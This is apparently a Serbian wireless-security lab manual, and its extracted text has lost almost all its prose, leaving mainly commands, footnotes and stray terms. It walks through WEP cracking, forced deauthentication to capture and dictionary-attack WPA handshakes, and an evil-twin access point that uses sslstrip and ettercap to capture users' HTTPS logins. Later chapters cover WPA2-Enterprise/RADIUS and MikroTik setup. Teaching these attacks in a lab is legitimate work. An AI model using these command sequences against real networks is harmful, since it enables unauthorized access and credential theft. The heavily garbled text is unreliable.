aireplay-ng ARP
;
aircrack-ng IV WEP .
:
:
airmon-ng start wlan0
airodump-ng
WEP :
airodump-ng mon0

29 http://www.aircrack-ng.org/doku.php?id=aireplay-ng


7.7 : WEP

, :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w snimak mon0
:

-c 9 ,
--bssid 00:14:6C:7E:40:80 ,
-w snimak .
aireplay-ng .
aireplay-ng ARP
. :
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
:

-3 ,
-b 00:14:6C:7E:40:80 - ,
-h 00:0F:B5:88:AC:82 - .
ARP
:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
, airodump-ng
, (
7.8).


7.8 : airodump-ng

( 20,000 64-
40,000 128- ) aircrack-ng
WEP :
aircrack-ng -b 00:14:6C:7E:40:80 snimak*.cap
:

-b 00:14:6C:7E:40:80 - ,
snimak*.cap .
(7.9):

7.9 : aircrack-ng

1: 64- WEP
WEP .
64- : password WEP .
.
WEP .
.


2: 128- WEP
WEP .
128- : password WEP .
.
WEP .
.

VIII

WPA/WPA2

.
IEEE 802.11i
.
,
.

8. WPA/WPA2
8.1

WEP .
IEEE 2001.
.
IEEE 802.11i (WPA230). ,
Wi-Fi ,
, -
WEP . ,
IEEE .
WEP
. 2003. Wi-Fi WPA ,
2004. IEEE 802.11i , WPA2.
WPA WPA2 . WPA RC4
, WPA2 AES . WPA RC4
WEP. RC4
, WPA
WEP .

8.2 WPA/WPA2

WPA WPA2 WEP . WPA WPA2


:
SOHO
(PSK31) ,
RADIUS32
.
, PSK .
WPA-PSK WPA2-PSK
.

WPA-PSK WPA2-PSK

WEP , WPA/WPA2 .
PMK33 256 . WPA-PSK WPA2-PSK, PMK
(PSK) (
8 63 ASCII ).

30 Wi-Fi Protected Access


31 Pre-shared key
32 Remote Authentication Dial In User Service
33 Pairwise master key


8.1 WPA/WPA2. PMK


(PSK). PMK 4096
hash PSK SSID .

8.1 : WPA/WPA2

PMK,
(PTK34). ,
.
PTK :
PMK,
(A-nonce),

34 Pairwise transient key


(S-nonce),
MAC ,
MAC .
PTK
e .
MIC35
. MIC hash
.
PMK PTK ,
PTK hash .
PMK.

8.3 WPA-PSK WPA2-PSK

WPA-PSK WPA2-PSK
.
. -
hash PMK. ,
WPA WPA2
.
8.1 PMK (PSK) 4096
hash . 4096 hash
.
, .
8.1 PMK PSK,
SSID . PMK

PSK, SSID PMK .

WPA WPA2 . WPA WPA2
PMK . MIC
.

.
.
aircrack-ng PSK.
aircrack-ng A-nonce S-nonce MIC.
MIC MIC
, PSK .

35 Message Integrity Protocol


:
airodump-ng
WPA-PSK/WPA2-PSK ,
;
aireplay-ng
.
,
.
aircrack-ng
hash .

:
:
airmon-ng start wlan0
airodump-ng
WPA-PSK/WPA2-PSK :
airodump-ng mon0

8.2 : WPA-PSK/WPA2-PSK

:
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk_snimak mon0
:
-c 9 ,


--bssid 00:14:6C:7E:40:80 ,
-w psk_snimak .
aireplay-ng .
:
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:88:AC:82 mon0
:
-0 ,
-a 00:14:6C:7E:40:80 - ,
-c 00:0F:B5:88:AC:82 - .
airodump-ng
( 8.3), aircrack-ng :
aircrack-ng -w /pentest/passwords/jtr/password.lst -b 00:14:6C:7E:40:80 psk_snimak*.cap
:
-b 00:14:6C:7E:40:80 - ,
psk_snimak*.cap .
-w /pentest/passwords/jtr/password.lst -.

8.3 :

8.4.


8.4 : aircrack-ng

1: WPA
WPA-PSK .
: password PMK .
.
WPA-PSK .
.

8.4 WPA-PSK/WPA2-PSK

WPA/WPA2
IV .
Windows WPA/WPA2
:
1. (Control panel)
.
2. (Properties).


8.5 :

5. ( 8.5)
(Add).
6. SSID, PSK (
8.6)


8.6 :

Linux WPA/WPA2
:
1. (. nano) wpa_supplicant.conf ,
:
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
ap_scan=1
fast_reauth=1

network={
ssid=" ESSID" >>
proto=WPA
key_mgmt=WPA-PSK
pairwise=TKIP
psk="" >>
}
2. WPA :
wpa_supplicant -i wlan0 -c wpa_supplicant.conf

IX

, .
Linux .
,
.

9.
9.1

.
Linux .

9.1 :



( 9.1). .

9.2

:
1. DHCP ,
2. ,
3. .

DHCP /etc/dhcp3/dhcpd.conf.
dhcpd.conf .
.
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bkp
nano /etc/dhcp3/dhcpd.conf
ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.0.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 10.0.0.255;
option routers 10.0.0.1;
option domain-name-servers 8.8.8.8;
range 10.0.0.100 10.0.0.150;
}
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd


Airbase-ng
. .
Airbase-ng ( at0),
.
airmon-ng start wlan0

airbase-ng -e BksAP -c 9 mon0


ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
DHCP
PID .
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid
at0

(at0) ( .
). iptables Linux .
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append PREROUTING -p udp --dport 53 -j DNAT --to default_gateway_od_eth0
echo 1 > /proc/sys/net/ipv4/ip_forward

9.3


.
. CUDA
,
.

, 36.

36 Man-in-the-middle



. 9.2.

9.2 :

. (Evil twin),
SSID- .
,
.
,
.
,
.

.
,

SSL .
(https )
Ettercap SSL .
, 76%
, Ettercap SSL

.
SSL .
:
Ettercap ;
Sslstrip HTTPS ;
Driftnet TCP ;


# http https Ettercap


iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
ettercap -T -q -p -i at0 // //
sslstrip -a -k -f
driftnet -v -i at0
9.3
www.gmail.com .

9.3 :

1:
.
,
.

2:
,
.

X


.
RADIUS
.


10.
10.1

SOHO
(PSK) .
WPA-PSK WPA2-PSK .
, , . WPA-Enterprise
WPA2-Enterprise .
.

. ,
.
(
, LDAP, SQL .)
( ).
WPA-Enterprise WPA2-Enterprise
IEEE 802.1X EAP37. IEEE 802.1X
.
.
,
.
:
, .
(NAS38),
(
802.1x ).
,
.
.
.
, . ,

. 802.1X

.
.
802.1X SOHO .
RADIUS

37 Extensible Authentication Protocol


38 Network Access Server


,
.
EAP .

. ,
. RADIUS39
IP . WPA
RADIUS , (. DIAMETER,
TACACS+, .).
, EAP
, RADIUS .
( 10.1).

10.1 : 802.1X


, EAP :
EAP-PEAP40 - MSCHAPv241
. MSCHAPv2

39 Remote Authentication Dial In User Service


40 Protected EAP


NT hash . PEAP-
Windows
.
EAP-TTLS42- PAP43, CHAP44 MSCHAPv2
. Linux Apple
Mac , Windows
.
PKI45
(
)
.
.

(anonymous), , ,
,
. RADIUS ,
(
CA46) .
. ,
( )
( 10.2).
,
.

10.2 :

41 Microsoft Challenge Handshake Authentication Protocol version 2


42 EAP-Tunneled Transport Layer Security
43 Password authentication protocol
44 Challenge-Handshake Authentication Protocol
45 Public Key Infrastructure
46 Certificate Authority


10.2 WPA/WPA2-Enterprise

Windows Server 2008


, RADIUS . , ,
.
.
WPA/WPA2-Enterprise :
1. .
2. .
3. RADIUS .
4. .
5. .


.
.
.
. start
dcpromo.
.
Create new
domain in a new forest. Next.


10.3 :

. bkslab.edu.rs.
Next.


10.4 :

.
Password2 .
. , Finish .
. ,
Password3 .
.
(OU - Organizational unit).
Start>Administrative Tools>Active Directory Users and Computers.
.
(bkslab.edu.rs) New-Organizational Unit.
.


10.5 :

OU . Wireless
. OU , New-User.

10.6 :

, Logon name mristic. next


Password2. .


. OU , New-Group.
Wireless. .
. Add to group
Wireless.

10.7 :

PEAP .
()
.
.
(Initial Configuration Tasks)
Add roles47. Active Directory Certificate Services Next.

47 , Start > Server Manager > Roles


10.8 :

Enterprise
Next.

10.9 :


:
Root CA ,
(Create a new private key),
.
, (
10.10).

10.10 :

,

.
Install.

PEAP . Microsoft (): Start >
MMC > Enter. MMC : File > Add/Remove Snap-in.
Certificates ( 10.11), Add.


10.11 : MMC

Computer account, Next ( 10.12).


Local computer, Finish, OK.

10.12 : MMC

Certificates (Local Computer Account)>Personal,


Certificates >All tasks>Request new certificates ( 10.13).
Domain Controller, Enroll.
Finish.


10.13 :

RADIUS

Windows Server RADIUS


IAS48 . Windows Server 2008 RADIUS
Network Policy and Access Services .
(Initial Configuration Tasks)
Add roles. Network Policy and Access Services Next (
10.14).

48 Internet Authentication Service


10.14 : Network Policy and Access Services

( 10.15):
Network Policy Server,
Routing and Remote Access Servers,
Remote Access Services,
Routing.


10.15 :

RADIUS
. e Start > nps.msc > Enter.
RADIUS server for 802.1X Wireless or Wired Connections (
10.16).


10.16 : RADIUS

802.1X (Configure 802.1x). 802.1X


Secure Wireless Connection Next.
RADIUS ( )
Add ( 10.17):
Friendly name: AP

IP Address: 192.168.1.1 (
)

Shared Secret: Password12345

RADIUS RADIUS
.


10.17 : RADIUS

Microsoft:
Protected EAP (PEAP),
Wireless.
NPS .


RADIUS .
Wireless Security ( 10.18):
WPA/WPA2,
o Version: WPA2,
o Encryption: AES,
o IP RADIUS , RADIUS
(Password12345).
(SSID, ,
, ...).


10.18 :

CA
.
. MMC , Certificates (Local
Computer Account) > Personal, Certificates.
, All Tasks > Export ( 10.19).


10.19 :

a ,
DER.
.

( 10.20),
(Trusted Root Certificate
Authorities). .
WPA2-Enterprise .


10.20 :

. Windows 7

SSID . Properties.
(Security Windows Vista Windows 7, Advanced
Windows XP) WPA2-Enterprise ,
AES ( 10.21). Windows XP
Enable IEEE 802.1x authentication for this network.


10.21 :

Windows 7 (Advanced Settings)


(User Authentication)
(Specify authentication mode).
, Settings PEAP
. PEAP
( 10.22):
(Validate
server certificate),
(Connect to these servers),
,
Secured password (EAP-MSCHAP v2).


10.22 : PEAP

.
,
, :
Username: mristic
Password: Password2

1: WPA2-Enterprise
WPA2-Enterprise .
,
RADIUS . RADIUS .

XI

MikroTik RouterOS

MikroTik .

.
.


11. MikroTik RouterOS


11.1 MikroTik RouterOS

RouterOS
. MikroTik Linux-.
Linux-, MikroTik .

SOHO .
.
.
, MikroTik x86 .

( ).
, x86 (
, , , ).
RouterBoard ( 11.1) . RouterBoard
MIPS (RISC)
.
x86
(L2TP VPN, IPSec VPN, 1Gbps..).

.

11.1 : MikroTik RouterBoard

MikroTik RouterOS x86


MikroTik .
.

11.2 MikroTik

MikroTik :


(SSH/Telnet),
Winbox ( , ),
Web page ( ).
CLI49 o ,
Winbox (.
DLL Winbox ).
Winbox ,
.
.
Winbox OSI
. IP
.
Winbox .

1 11.2.
192.168.88.1.

11.2 :

OSI
MAC . admin,
. Connect ( 2 11.2) .

49 Command line interface


11.3 MikroTik


. 11.3 .

11.3 :

:
LAN 88.88.88.2/20,
BksMT,
- WPA2,
IP
192.168.50.0/24,
,
1Mbs.
IP IP>Addresses.
, Address List,
Address ( 11.4).
.


11.4 : IP


Address List (
)

.

- 192.168.50.1/24
( 11.5).



11.5 :
IP



(Wireless>Security Profiles>Add - ).

11.6.


11.6 :


WPA2 profile

.

.
Wireless>Interfaces ,
( wlan1). 11.7
.
ap-bridge , .


11.7 :

DHCP
. DHCP
IP>DHCP Server>DHCP Setup. wlan1

DHCP . 192.168.50.0/24
, ( wlan1 -
192.168.50.1) .
192.168.50.2-192.168.50.100. DNS
. 11.8 DHCP .


11.8 : DHCP


(NAT). 192.168.50.0/24
ether1 . NAT
IP>Firewall>NAT.
General ( 11.9):
chain: SRCNAT,
: 192.168.50.0/24
: 0.0.0.0/0 ( ),
: ether1.
Action NAT-a MASQUERADE.
.


11.9 :

MikroTik .
1Mbs
.
MikroTik ,

.
.

1Mbs:
/queue simple add name="1M-korisnici" dst-address=192.168.50.0/24 interface=ether1 direction=both priority=8 queue=default/default limit-at=1000000/1000000 max-limit=1000000/1000000 disabled=no
:
name - ,

dst-address - (
);

interface - . Ether1
. ,
;

direction - (
). MikroTik ;


priority - .
. ,
;

queue - ;

limit-at - . .
, / (upload/download);

max-limit - .
;

disabled - .

1: MikroTik
MikroTik .


